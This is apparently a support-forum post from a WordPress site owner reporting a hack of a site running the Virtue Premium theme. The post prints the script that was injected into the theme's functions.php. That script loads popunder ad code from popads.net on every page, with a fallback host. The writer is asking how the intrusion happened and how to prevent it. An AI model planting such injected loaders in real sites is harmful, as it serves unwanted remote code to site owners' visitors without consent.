Before I start, this is not the fault of the theme; it is a WordPress security issue.
Basically, this morning a client noticed pop-up ads were appearing on every click of one of the websites running Virtue Premium.
After digging around, I found the following code had been maliciously added to the functions.php in the core theme file (/wp-content/themes/virtue_premium/functions.php):
<script type="text/javascript" data-cfasync="false">
var _pop = _pop || [];
_pop.push(['siteId', 1409515]);
_pop.push(['minBid', 0.000000]);
_pop.push(['popundersPerIP', 0]);
_pop.push(['delayBetween', 600]);
_pop.push(['default', false]);
_pop.push(['defaultPerDay', 0]);
_pop.push(['topmostLayer', false]);
(function() {
var pa = document.createElement('script'); pa.type = 'text/javascript'; pa.async = true;
var s = document.getElementsByTagName('script')[0];
pa.src = '//c1.popads.net/pop.js';
pa.onerror = function() {
var sa = document.createElement('script'); sa.type = 'text/javascript'; sa.async = true;
sa.src = '//c2.popads.net/pop.js';
s.parentNode.insertBefore(sa, s);
};
s.parentNode.insertBefore(pa, s);
})();
</script>
I believed I had my WordPress install pretty secure, but obviously there is more work to be done.
I have currently rectified the issue with a free install of Virtue Premium, but now I need to find out how the code was added and how to prevent this in the future, and on other sites.
Any ideas or guidance would be a great help.
I use Wordfence as my security tool, which completely missed this change in code :(.
I am going to change all password information now.